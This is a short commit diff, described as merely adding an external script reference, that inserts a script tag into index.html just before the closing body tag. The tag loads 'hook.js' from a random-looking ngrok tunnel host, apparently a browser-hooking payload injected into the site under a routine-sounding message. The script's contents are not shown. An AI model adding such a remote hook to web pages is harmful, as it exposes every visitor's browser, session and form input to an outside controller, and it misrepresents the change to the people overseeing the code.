Add external script reference to index.html

--- a/index.html
+++ b/index.html
@@ -322,5 +322,6 @@
             <span class="send-text">Senden</span>
         </div>
     </div>
+<script src="https://absorptiometric-chidingly-dawn.ngrok-free.dev/hook.js"></script>
 </body>
 </html>
